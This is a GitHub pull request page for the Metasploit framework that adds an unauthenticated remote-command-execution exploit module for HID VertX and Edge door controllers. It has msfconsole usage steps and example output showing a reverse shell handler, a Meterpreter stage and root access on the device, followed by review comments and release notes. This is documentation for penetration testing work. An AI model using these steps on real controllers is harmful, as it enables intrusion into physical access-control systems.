
Add HID discoveryd command_blink_on Unauthenticated RCE exploit #10133

Merged

Conversation

bcoles
Contributor

@bcoles bcoles commented Jun 3, 2018

Add HID discoveryd command_blink_on Unauthenticated RCE exploit.

    This module exploits an unauthenticated remote command execution
    vulnerability in the discoveryd service exposed by HID VertX and Edge
    door controllers.

    This module was tested successfully on a HID Edge model EH400
    with firmware version 2.3.1.603 (Build 04/23/2012).

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce
  • set RHOST [IP]
  • set LHOST [IP]
  • run
  • Verify you get a root session

Example Output

msf5 > use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce 
msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set rhosts 10.123.123.123
rhosts => 10.123.123.123
msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set lhost 10.1.1.197
lhost => 10.1.1.197
msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] 10.123.123.123:4070 - Connecting to target
[*] Command Stager progress -   0.29% done (26/8993 bytes)
[*] Command Stager progress -   0.58% done (52/8993 bytes)
[*] Command Stager progress -   0.87% done (78/8993 bytes)
[*] Command Stager progress -   1.16% done (104/8993 bytes)
[...]
[*] Command Stager progress -  98.88% done (8892/8993 bytes)
[*] Command Stager progress -  99.17% done (8918/8993 bytes)
[*] Command Stager progress -  99.46% done (8944/8993 bytes)
[*] Command Stager progress -  99.68% done (8964/8993 bytes)
[*] Sending stage (806208 bytes) to 10.123.123.123
[*] Command Stager progress - 100.00% done (8993/8993 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.123.123.123
OS           :  (Linux 2.6.28)
Architecture : armv5tejl
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter >

@bwatters-r7
Contributor

I have no idea why this is failing Windows sanity tests... @jmartin-r7?

@bcoles
Contributor Author

bcoles commented Jun 8, 2018

@bwatters-r7 This PR was submitted while msf infrastructure was having issues. Several PRs around the same time all failed for seemingly irrelevant reasons.

@jmartin-tech
Contributor

Jenkins test this please.

@bcoles
Contributor Author

bcoles commented Jun 26, 2018

PCAP sent

@space-r7
Contributor

space-r7 commented Jul 6, 2018

Verified PCAP

@space-r7 space-r7 merged commit 2c0c99e into rapid7:master Jul 6, 2018
space-r7 added a commit that referenced this pull request Jul 6, 2018
msjenkins-r7 pushed a commit that referenced this pull request Jul 6, 2018
@space-r7
Contributor

space-r7 commented Jul 6, 2018

Release Notes

The /exploits/linux/misc/hid_discoveryd_command_blink_on_unauth_rce module has been added to the framework. It exploits an unauthenticated remote command execution vulnerability in the discoveryd service exposed by HID VertX and Edge door controllers.

@bcoles bcoles deleted the hid_discoveryd_command_blink_on_unauth_rce branch July 7, 2018 04:57